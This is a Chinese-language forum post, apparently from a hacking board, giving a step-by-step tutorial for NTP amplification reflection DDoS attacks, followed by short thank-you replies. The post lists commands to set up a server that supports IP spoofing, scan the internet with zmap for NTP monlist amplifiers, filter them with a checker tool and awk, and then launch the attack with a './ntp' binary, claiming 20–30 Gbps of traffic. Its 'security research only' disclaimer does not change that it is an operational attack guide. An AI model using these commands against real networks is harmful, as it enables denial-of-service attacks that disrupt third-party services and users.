NTP放大反射DDOS攻击扫描教程,放大列表扫描教程
NTP放大反射DDOS攻击扫描教程,放大列表扫描教程
图上是国外测的 本文实测 能有二三十G
声明:文章中介绍的工具、技术带有一定的攻击性,仅供安全研究,请合理合法使用。!
关于有些服务器不能发起攻击的问题 请自己检查系统 实测脚本没有问题!
注意服务器要支持ip伪造/欺骗
本文使用的服务器系统
centos 6.6 64位
内核
2.6.32-504.el6.x86_64
先更新系统
yum -y update
复制代码
区分centos6 centos7 执行不同的命令!
Centos 6
wget http://dl.fedoraproject.org/pub/epel/6/x86_64/epel-release-6-8.noarch.rpm
sudo rpm -Uvh epel-release-6-8.noarch.rpm
复制代码
centos 7
wget http://dl.fedoraproject.org/pub/epel/7/x86_64/e/epel-release-7-5.noarch.rpm
sudo rpm -Uvh epel-release-7-5.noarch.rpm
复制代码
安装必要的依赖环境!
yum -y install gcc libcap libpcap libpcap-devel screen php dstat cmake gmp gmp-devel gengetopt byacc flex git json-c cpan vnstat zmap
复制代码
上传这里的文件到你的机器!
游客,如果您要查看本帖隐藏内容请回复
开始扫描ntp放大列表
zmap -p 123 -M udp –probe-args=file:ntp_123_monlist.pkt -o monlist_fingerprint.txt
复制代码
扫描时间比较长
扫描完成后
运行 ntp、ntpchecker
首先给它的权限:
chmod 777 ntp
chmod 777 ntpchecker
复制代码
运行ntpchecker
./ntpchecker monlist_fingerprint.txt step1.txt 1 0 1
复制代码
开始执行过滤!
awk ‘$2>419{print $1}’ step1.txt | sort -n | uniq | sort -R > ntpamp.txt
复制代码
过滤完成后就可以攻击了
./ntp
666 学习了
666 学习了
看看效果怎么样
查看
学习
比较多的
研究NTP,感谢楼主
牛逼3666666
牛逼366666
谢谢楼主,
,666666
看看,谢谢楼主
谢谢楼主,真的很不错
研究一下
可以可以,学习了